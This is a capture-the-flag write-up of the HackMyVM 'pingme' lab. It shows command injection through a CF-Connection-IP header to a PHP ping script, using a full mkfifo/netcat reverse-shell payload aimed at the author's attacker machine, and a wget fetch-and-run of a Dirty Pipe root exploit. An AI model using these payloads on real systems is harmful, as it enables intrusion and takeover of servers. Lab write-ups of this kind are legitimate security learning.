While doing a CTF Challenge recently from hackmyvm.eu called pingme, I managed to get root access to the system, but not at all in the way the author intended. However it was a fun ride. There are other write-ups that do it the right way and I might even do such a write up, but here is the wrong way.
Lets get into it.
The vm can be downloaded from hackmyvm.eu as an OVA file and imported into Oracle VirtualBox.
- 192.168.186.150 – This is my BlackArch enumeration system.
- 192.168.186.17 – This is the Comingsoon vm.
For enumeration of the hackmyvm pingme Challenge I will be using my BackArch system build that I created in previous blog post. You can use any Kali, BlackArch, Parrot or just standard Linux to proceed.
I use nmap for enumeration for CTF Challenges
nmap -T5 -F 192.168.186.17
|-T5||Highest speed scan.|
|-F||Only scan the top 100 popular ports|
Open port 80 in fire fox.
Interesting, there is some sort of php script that is pinging my host. This is where I went wrong and really wrong. I tried to figure out where the ip address is coming from and I discovered that is comes from the php $_Server variable which captures the client IP’s address.
I also discovered that there is a common issue with this and sites that are behind Cloudflare servers. Seems it’s common to check if you are behind Cloudflare and Cloudflare even provide a HTTP Header that has the right Client IP address. Its called CF-Connection-IP. PHP scripts checking for client IP addresses sometimes check if the this Header is set. In this case it was, and after some playing around, I Managed to get a reverse shell from it.
Using the repeater from Burpsuite I was able to get a reverse shell with the below Header, embedded with all the other headers.
CF-Connection-IP: 127.0.0.1; rm /tmp/f;mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1 | nc 192.168.186.150 1234 >/tmp/f; ping 192.168.186.150
Root access via a Dirty Pipe
Next step was trivial and again not what the author intended. As CTF challengers we love to find unintended ways of doing things.
Grab the Dirty-Pipe binary from github and upload it into /tmp/ on the pingme virtual Machine. Change the permissions to give it execution rights and run it.
cd /tmp/ wget http://192.168.186.150:8000/exploit-static chmod +x exploit-static
Now you can view all the flags.
The hackmyvm pingme was a fun room and I used the completely wrong way of doing it. Well done to the author for putting the thought into this one of my most enjoyable yet!
You can find my Youtube video to the official way of doing this below.